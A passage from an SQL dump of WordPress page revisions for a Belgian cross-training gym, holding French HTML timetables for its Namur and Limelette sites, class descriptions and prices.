class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:17:43', '2013-11-03 09:17:43', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(410, 1, '2013-11-03 09:28:18', '2013-11-03 09:28:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>Séance de la salle de Limelette :</h1>\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:28:18', '2013-11-03 09:28:18', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(411, 1, '2013-11-03 09:28:46', '2013-11-03 09:28:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1> Séances de la salle de Namur :</h1>\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:28:46', '2013-11-03 09:28:46', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(412, 1, '2013-11-03 09:29:00', '2013-11-03 09:29:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>Séances de la salle de Limelette :</h1>\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:29:00', '2013-11-03 09:29:00', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(413, 1, '2013-11-03 09:29:58', '2013-11-03 09:29:58', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er 